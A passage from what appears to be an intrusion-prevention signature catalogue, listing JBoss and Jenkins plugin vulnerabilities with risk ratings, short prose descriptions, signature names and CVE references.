First detected in:	sgpkg-ips-1499-5242
Last changed:	sgpkg-ips-1581-5242
Platform:	Generic
Software:	JBoss
Type:	Code Injection
Description:	A vulnerability in JBOSS EAP/AS, versions 6.x and before, which allows remote attackers to execute arbitrary code by sending a serialized object to the interface.

Jboss_Seam_2_Code_Injection

About this vulnerability:

A vulnerability in JBoss Seam 2

Risk:

High

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Red Hat JBoss Enterprise Application Platform

Type:

Code Injection

Description:

A vulnerability in JBoss Seam 2 where input for the JBoss Expression Language Expressions are not properly sanitized, giving remote attackers the ability to execute arbitrary code via a crafted URL.

Situation:

HTTP_CSU-Jboss_Seam_2_Code_Injection

References:

CVE-2010-1871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871

BID-41994
http://www.securityfocus.com/bid/41994

OSVDB-66881
http://www.osvdb.org/66881

Jenkins-Active-Choices-Plugin-CVE-2021-21699-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Active Choices Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1407-5242

Platform:

Generic

Software:

Jenkins Active Choices Plugin

Type:

Input Validation

Description:

Insufficient validation of parameter names causes a cross-site scripting vulnerability in the Active Choices Plugin for Jenkins.

Situation:

File-Text_Jenkins-Active-Choices-Plugin-CVE-2021-21699-Stored-Cross-Site-Scripting

References:

CVE-2021-21699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21699

Jenkins-Active-Choices-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Active Choices Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1364-5242

Last changed:

sgpkg-ips-1364-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in Jenkins Active Choices Plugin. This vulnerability is due to insufficient validation of referencedParameters values shown in the Build with Parameters page of the configured job. A remote, authenticated attacker could exploit this vulnerability by sending a crafted message to a vulnerable server. Successful exploitation could result in execution of script code in the security context of target user's browser.

Situation:

HTTP_CRL-Jenkins-Active-Choices-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2021-21616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21616

Jenkins-Amazon-EC2-Plugin-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in Amazon EC2 plugin for Jenkins

Risk:

High

First detected in:

sgpkg-ips-1276-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Malfunction

Description:

There exists a vulnerability in the Amazon EC2 plugin for Jenkins, versions 1.50.1 and before, which allows remote attackers to provision Amazon EC2 instances with attacker specified template IDs, due to the lack of CSRF protection mechanism on certain endpoints handled by the plugin.

Situation:

HTTP_CSU-Jenkins-Amazon-EC2-Plugin-Cross-Site-Request-Forgery

References:

CVE-2020-2186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2186

Jenkins-Arbitrary-File-Read-CVE-2024-23897

About this vulnerability:

A vulnerability in Jenkins

Risk:

High

First detected in:

sgpkg-ips-1681-5242

Last changed:

sgpkg-ips-1836-5242

Platform:

Generic

Software:

Jenkins

Type:

Malfunction

Description:

An arbitrary file read vulnerability has been reported in Jenkins. An unauthenticated attacker can use this vulnerability to access sensitive information via the Jenkins CLI, which can lead to remote code execution.

Situation:

File-Text_Xstream-Unsafe-Deserialization
WebSocket_CS-Jenkins-Arbitrary-File-Read-CVE-2024-23897
File-Binary_Jenkins-Arbitrary-File-Read-CVE-2024-23897

References:

CVE-2024-23897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23897

Jenkins-Artifact-Repository-Parameter-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Artifact Repository Parameter Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1344-5242

Last changed:

sgpkg-ips-1344-5242

Platform:

Generic

Software:

Jenkins Artifact Repository Parameter Plugin

Type:

Input Validation

Description:

There exists a stored cross-site scripting vulnerability in Jenkins Artifact Repository Parameter plugin. Successful exploitation could lead in arbitrary script execution in the target user's browser.

Situation:

HTTP_CRL-Jenkins-Artifact-Repository-Parameter-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2021-21622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21622

Jenkins-Badge-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Badge Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1430-5242

Last changed:

sgpkg-ips-1430-5242

Platform:

Generic

Software:

Jenkins Badge Plugin

Type:

Input Validation

Description:

Insufficient validation of inputs causes a cross-site scripting vulnerability in the Badge plugin for Jenkins. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Jenkins-Badge-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2022-23108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23108

Jenkins-Build-Monitor-View-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Build Monitor View Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1711-5242

Last changed:

sgpkg-ips-1711-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for the Jenkins plugin Build Monitor View. This vulnerability is due to improper input validation when handling build monitor view names. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

HTTP_CRL-Jenkins-Build-Monitor-View-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2024-28156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28156

Jenkins-Build-With-Parameters-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Build With Parameters Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1338-5242

Last changed:

sgpkg-ips-1338-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Insufficient validation of the name and description properties in requests sent to the Build With Parameters plugin causes a cross-site scripting vulnerability in Jenkins. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Jenkins-Build-With-Parameters-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2021-21628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21628

Jenkins-Ci-Server-Build-metrics-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins build-metrics Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1204-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in build-metrics plugin of Jenkins CI. The vulnerability is due to the fact that the template used to render the output for the build-metrics plugin has HTML escaping disabled. A remote attacker can exploit this vulnerability by enticing a target user into clicking a malicious link. Successful exploitation could result in the execution of script code in security context of the target user's browser.

Situation:

HTTP_CRL-Jenkins-Ci-Server-Build-metrics-Cross-Site-Scripting

References:

CVE-2019-10475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10475

Jenkins-Ci-Server-Commons-Collections-Library-Insecure-Deserialization

About this vulnerability:

A vulnerability in Jenkins Jenkins

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Malfunction

Description:

An insecure deserialization vulnerability has been reported in Jenkins CI Server. This vulnerability is due to deserialization of untrusted data while having the vulnerable version of Apache Commons-Collections library in the code path. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted serialized object. Successful exploitation can result in arbitrary code execution in the security context of the System user.

Situation:

Generic_CS-Jenkins-Ci-Server-Commons-Collections-Library-Insecure-Deserialization

References:

CVE-2015-8103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103

BID-77636
http://www.securityfocus.com/bid/77636

Jenkins-Ci-Server-Getorcreate-Policy-Bypass

About this vulnerability:

A vulnerability in Jenkins

Risk:

Moderate

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Insufficient validation of login requests by the getOrCreate() function causes a policy bypass vulnerability in Jenkins. A successful exploit allows an attacker to gain administrator access to the service.

Situation:

HTTP_CRL-Jenkins-Ci-Server-Getorcreate-Policy-Bypass

References:

CVE-2018-1999001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999001

Jenkins-Ci-Server-Gitlab-Hook-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Gitlab Hook Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1219-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

There has been reported a cross-site scripting vulnerability in Gitlab Hook plugin of Jenkins CI. Successful exploitation could lead in arbitrary script code execution in the browser.

Situation:

HTTP_CSU-Jenkins-Ci-Server-Gitlab-Hook-Cross-Site-Scripting

References:

CVE-2020-2096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2096

Jenkins-Ci-Server-Groovy-Pipeline-Remote-Code-Execution

About this vulnerability:

A vulnerability in Jenkins Groovy Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1190-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

There exists a pre-auth remote code execution vulnerability in the Groovy Pipeline plugin component of Jenkins CI. This vulnerability could be exploited remotely. Successful exploitation leads in arbitrary code execution.

Situation:

HTTP_CSU-Jenkins-Ci-Server-Groovy-Pipeline-Remote-Code-Execution

References:

CVE-2019-1003001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003001

Jenkins-Ci-Server-Localedrivenresourceselector-Arbitrary-File-Read

About this vulnerability:

A vulnerability in Jenkins

Risk:

Moderate

First detected in:

sgpkg-ips-1092-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Improper handling of Accept-Language HTTP headers causes an arbitrary file read vulnerability in Jenkins. A successful exploit allows an attacker to read arbitrary files on the target system.

Situation:

HTTP_CS-Jenkins-Ci-Server-Localedrivenresourceselector-Arbitrary-File-Read

References:

CVE-2018-1999002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999002

Jenkins-Ci-Server-Multiple-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in Jenkins Jenkins

Risk:

Moderate

First detected in:

sgpkg-ips-900-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Malfunction

Description:

Improper validation of some requests causes a cross-site request forgery vulnerabillity in Jenkins server. Using a crafted reques, a remote attacker can gain the ability to run arbitrary code with the privileges of the Jenkins server.

Situation:

HTTP_CS-Jenkins-Ci-Server-Multiple-Cross-Site-Request-Forgery

References:

CVE-2017-1000356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000356

BID-98062
http://www.securityfocus.com/bid/98062

Jenkins-Ci-Server-Xstream-Insecure-Deserialization

About this vulnerability:

A vulnerability in Jenkins Jenkins

Risk:

Moderate

First detected in:

sgpkg-ips-753-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Malfunction

Description:

Arbitrary code can be exploited by exploiting a deserialization vulnerability in the XStream library.

Situation:

HTTP_CS-Jenkins-Ci-Server-Xstream-Insecure-Deserialization
File-Text_Jenkins-Ci-Server-Xstream-Insecure-Deserialization

References:

CVE-2016-0792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0792

Jenkins-Claim-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Claim Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1360-5242

Last changed:

sgpkg-ips-1360-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

There exists a stored cross-site scripting vulnerability in Jenkins Claim plugin. Successful exploitation could lead in execution of script code in the browser.

Situation:

HTTP_CRL-Jenkins-Claim-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2021-21619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21619

Jenkins-CLI-Deserialization

About this vulnerability:

A vulnerability in Jenkins CLI.

Risk:

High

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Linux

Software:

Jenkins

Type:

Input Validation

Description:

A vulnerability in Jenkins CLI, version 2.56, which allows remote attackers to execute arbitrary code by sending a malicious serialized object within a serialized SignedObject, due to insufficient sanitization of data sent to the readFrom method within the Command class.

Situation:

HTTP_CRL-Jenkins-CLI-Deserialization

References:

CVE-2017-1000353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000353

Jenkins-CLI-Rmi-Java-Deserialization

About this vulnerability:

An attempt to exploit a Jenkins CLI RMI Java Deserialization vulnerability detected

Risk:

High

First detected in:

sgpkg-ips-975-5242

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

Jenkins

Type:

Configuration Error

Description:

A vulnerability in Jenkins CLI, versions before 1.638 and LTS before 1.625.2, which allows remote attackers to execute arbitrary code via a crafted serialized Java object.

Situation:

Generic_CS-Jenkins-Ci-Server-Commons-Collections-Library-Insecure-Deserialization

References:

CVE-2015-8103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103

BID-77636
http://www.securityfocus.com/bid/77636

Jenkins-Config-File-Provider-Plugin-External-Entity-Injection

About this vulnerability:

A vulnerability in Jenkins Config File Provider Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

An XXE vulnerability exists in Jenkins Config File Provider Plugin. The vulnerability is due to insufficient validation of XML data when utilizing Config File Provider Plugin. A remote authenticated attacker could exploit this vulnerability by sending a crafted request. Successful exploitation could lead to the disclosure of file contents for any file readable by the Jenkins server process.

Situation:

HTTP_CRL-Jenkins-Config-File-Provider-Plugin-External-Entity-Injection

References:

CVE-2021-21642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21642

Jenkins-Core-CLI-Cross-Site-WebSocket-Hijacking-CVE-2024-23898

About this vulnerability:

An attempt to exploit a vulnerability in Jenkins detected

Risk:

High

First detected in:

sgpkg-ips-1686-5242

Last changed:

sgpkg-ips-1686-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Jenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability, allowing attackers to execute CLI commands on the Jenkins controller.

Situation:

HTTP_CS-Jenkins-Core-CLI-Cross-Site-WebSocket-Hijacking-CVE-2024-23898

References:

CVE-2024-23898
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23898

Jenkins-Core-Fileparametervalue-Directory-Traversal

About this vulnerability:

A vulnerability in Jenkins

Risk:

Moderate

First detected in:

sgpkg-ips-1179-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in Jenkins. Authentication is required to exploit this vulnerability. Successful exploitation could lead in arbitrary file write and code execution.

Situation:

HTTP_CS-Jenkins-Core-Fileparametervalue-Directory-Traversal

References:

CVE-2019-10352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10352

Jenkins-Core-JSON-Lib-Denial-Of-Service

About this vulnerability:

A vulnerability in Jenkins Jenkins

Risk:

Moderate

First detected in:

sgpkg-ips-1820-5242

Last changed:

sgpkg-ips-1820-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Improper parsing of requests causes a denial of service vulnerability in Jenkins. An attacker can trigger the condition by sending crafted invalid JSON payloads in requests.

Situation:

HTTP_CS-Jenkins-Core-JSON-Lib-Denial-Of-Service

References:

CVE-2024-47855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47855

Jenkins-Credentials-Plugin-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Credentials Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1350-5242

Last changed:

sgpkg-ips-1350-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

There exists a reflected cross-site scripting vulnerability in Jenkins Credentials Plugin. Successful exploitation could lead in arbitrary execution of javascript code.

Situation:

HTTP_CSU-Jenkins-Credentials-Plugin-Reflected-Cross-Site-Scripting

References:

CVE-2021-21648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21648

Jenkins-Credentials-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Credentials Plugin.

Risk:

High

First detected in:

sgpkg-ips-1469-5242

Last changed:

sgpkg-ips-1469-5242

Platform:

Generic

Software:

Jenkins Credentials Plugin

Type:

Input Validation

Description:

A vulnerability in Jenkins Credentials Plugin, versions 1111.v35a_307992395 and prior, which allows remote attackers to execute arbitrary code by sending a crafted message to vulnerable server, due to insufficient validation of name and description parameters.

Situation:

HTTP_CS-Jenkins-Credentials-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2022-29036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29036

Jenkins-CVS-Plugin-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in Jenkins CVS Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1283-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Malfunction

Description:

The lack of a CSRF protection mechanism on certain endpoints causes a cross-site request forgery vulnerability in the Jenkins CVS plugin. A successful exploit may allow an attacker to manipulate the site contents.

Situation:

HTTP_CSU_Jenkins-CVS-Plugin-Cross-Site-Request-Forgery

References:

CVE-2020-2184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2184

Jenkins-Dashboard-View-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Dashboard View Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1351-5242

Last changed:

sgpkg-ips-1351-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

There exists a stored cross-site scripting vulnerability in Jenkins Dashboard View Plugin. Successful exploitation could lead in arbitrary execution of script code.

Situation:

HTTP_CRL-Jenkins-Dashboard-View-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2021-21649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21649

Jenkins-Extra-Columns-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Extra Columns Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1370-5242

Last changed:

sgpkg-ips-1370-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Insufficient request validation causes a cross-site scripting vulnerability in the Jenkins Extra Columns plugins. A successful exploit allows an attacker to execute arbitrary code in a user's browser.

Situation:

HTTP_CRL-Jenkins-Extra-Columns-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2021-21630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21630

Jenkins-File-Parameter-Plugin-Stashedfileparametervalue-Arbitrary-File-Write

About this vulnerability:

A vulnerability in Jenkins File Parameter Plugin

Risk:

High

First detected in:

sgpkg-ips-1604-5242

Last changed:

sgpkg-ips-1604-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

An arbitrary file write vulnerability has been reported in Jenkins File Parameter Plugin. The vulnerability is due to missing input validation error. A remote, authenticated attacker could exploit these vulnerabilities by sending a crafted request to the target server. Successfully exploiting these vulnerabilities could result in arbitrary code execution on the target system.

Situation:

HTTP_CRL-Jenkins-File-Parameter-Plugin-Stashedfileparametervalue-Arbitrary-File-Write

References:

CVE-2023-32986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32986

Jenkins-Filesystem-Trigger-Plugin-External-Entity-Injection

About this vulnerability:

A vulnerability in Jenkins Filesystem Trigger Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1359-5242

Last changed:

sgpkg-ips-1359-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

An XXE vulnerability exists in Jenkins Filesystem Trigger Plugin. The vulnerability is due to insufficient validation of XML data in Filesystem Trigger Plugin. A remote authenticated attacker could exploit this vulnerability by sending a crafted request. Successful exploitation could lead to the disclosure of file contents for any file readable by the Jenkins.

Situation:

File-TextId_Jenkins-Filesystem-Trigger-Plugin-External-Entity-Injection

References:

CVE-2021-21659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21659

Jenkins-Generic-Webhook-Trigger-Plugin-External-Entity-Injection

About this vulnerability:

A vulnerability in Jenkins Generic Webhook Trigger Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Generic

Software:

Jenkins Generic Webhook Trigger Plugin

Type:

Input Validation

Description:

Insufficient validation of XPath parameters in the Generic Webhook Trigger Plugin for Jenkins causes an external entity injection vulnerability that allows a remote attacker to read arbitrary files on the target system.

Situation:

HTTP_CRL-Jenkins-Generic-Webhook-Trigger-Plugin-External-Entity-Injection

References:

CVE-2021-21669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21669

Jenkins-Git-Client-Remote-Command-Execution

About this vulnerability:

A vulnerability in Jenkins Git Client Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1194-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Improper handling of user supplied values to the git plugin causes a command execution vulnerability in Jenkins. A successful exploit allows an attacker to run arbitrary commands with the privileges of the plugin.

Situation:

File-Text_Jenkins-Git-Client-Remote-Command-Execution

References:

CVE-2019-10392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10392

Jenkins-Gitlab-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins GitLab Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1487-5242

Last changed:

sgpkg-ips-1487-5242

Platform:

Generic

Software:

Jenkins GitLab Plugin

Type:

Input Validation

Description:

Insufficient validation of user-sent data causes a cross-site scripting vulnerability in Gitlab. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

File-Text_Jenkins-Gitlab-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2022-34777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34777

Jenkins-Junit-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins JUnit Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1485-5242

Last changed:

sgpkg-ips-1485-5242

Platform:

Generic

Software:

Jenkins JUnit Plugin

Type:

Input Validation

Description:

Improper esacping of characters causes a cross-site scripting vulnerability in the JUnit plugin for Jenkins. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Jenkins-Junit-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2022-34176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34176

Jenkins-Matrix-Project-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Matrix Project Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1431-5242

Last changed:

sgpkg-ips-1431-5242

Platform:

Generic

Software:

Jenkins Matrix Plugin

Type:

Input Validation

Description:

Insufficient validation of node and label names, and label descriptions parameters in requests causes a cross-site scripting vulnerability in the Jenkins Matrix Project Plugin. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Jenkins-Matrix-Project-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2022-20615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20615

Jenkins-Nuget-Plugin-External-Entity-Injection

About this vulnerability:

A vulnerability in Jenkins Nuget Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1358-5242

Last changed:

sgpkg-ips-1358-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

There exists an XXE vulnerability in Jenkins NuGet Plugin. Successful exploitation could lead in disclosure of file contents.

Situation:

HTTP_CS-Jenkins-Nuget-Plugin-External-Entity-Injection

References:

CVE-2021-21658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21658

Jenkins-Pipeline-Build-Step-Plugin-Job-Name-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Pipeline: Build Step Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1563-5242

Last changed:

sgpkg-ips-1563-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Improper input validation for job names sent over the network causes a cross-site scripting vulnerability in Jenkins. A successful explot allows an attacker to execute arbitrary code on a user's browser.

Situation:

HTTP_CRL-Jenkins-Pipeline-Build-Step-Plugin-Job-Name-Stored-Cross-Site-Scripting

References:

CVE-2023-25762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25762

Jenkins-Plot-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Plot Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1504-5242

Last changed:

sgpkg-ips-1504-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Improper input validation of plot descriptions in the Plot plugin causes a cross-site scripting vulnerability in Jenkins. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Jenkins-Plot-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2022-34783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34783

Jenkins-Plugin-Resources-Directory-Traversal

About this vulnerability:

A vulnerability in Jenkins

Risk:

Moderate

First detected in:

sgpkg-ips-1045-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jenkins

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in Jenkins. This vulnerability can be exploited by sending crafted request to the target system. Successful exploitation could lead to information disclosure.

Situation:

HTTP_CSU-Jenkins-Plugin-Resources-Directory-Traversal

References:

CVE-2018-6356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6356

Jenkins-Remoting-Fetchjar-Arbitrary-File-Read

About this vulnerability:

A vulnerability in Jenkins Jenkins

Risk:

Moderate

First detected in:

sgpkg-ips-1794-5242

Last changed:

sgpkg-ips-1794-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

Improper input validation in the Remoting component in Jenkins causes an arbitrary file read vulnerability, which an attacker can exploit to gain access to files on the target system.

Situation:

WebSocket_CS-Jenkins-Remoting-Fetchjar-Arbitrary-File-Read
Generic_CS-Jenkins-Remoting-Fetchjar-Arbitrary-File-Read

References:

CVE-2024-43044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43044

Jenkins-Repository-Connector-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Repository Connector Plugin

Risk:

High

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Generic

Software:

Jenkins

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in Jenkins Repository Connector plugin. This vulnerability is due to insufficient validation of the name and description properties in parameterDefinitions. A remote, authenticated attacker could exploit this vulnerability by sending a crafted message to vulnerable server. Successful exploitation could result in execution of script code in the security context of target user's browser.

Situation:

HTTP_CRL-Jenkins-Plot-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2021-21618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21618

Jenkins-Rundeck-Plugin-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Rundeck Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1482-5242

Last changed:

sgpkg-ips-1482-5242

Platform:

Generic

Software:

Jenkins Rundeck Plugin

Type:

Input Validation

Description:

Improper validation of URL schemes sent to the Rundeck webhook causes a cross-site scripting vulnerability in Jenkins. A successful exploit allows an attacker to execute arbitrary scripts in a target user's browser.

Situation:

File-Text_Jenkins-Rundeck-Plugin-Stored-Cross-Site-Scripting

References:

CVE-2022-30956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30956

Jenkins-Script-Security-Plugin-Sandbox-Bypass-CVE-2019-1003029

About this vulnerability:

A vulnerability in Jenkins

Risk:

High

First detected in:

sgpkg-ips-1467-5242

Last changed:

sgpkg-ips-1467-5242

Platform:

Generic

Software:

Jenkins

Type:

Malfunction

Description:

There exists a sandbox bypass vulnerability in the Jenkins Script Security Plugin. Successful exploitation may lead in arbitrary code execution.

Situation:

HTTP_CRL-Jenkins-Script-Security-Plugin-Sandbox-Bypass-CVE-2019-1003029

References:

CVE-2019-1003029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003029

Jenkins-Scriptler-Plugin-Parameter-Names-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Jenkins Scriptler Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1366-5242

Last changed:

sgpkg-ips-1366-5242

Platform:

Generic

Software:

Jenkins Scriptler Plugin

Type:

Input Validation

Description:

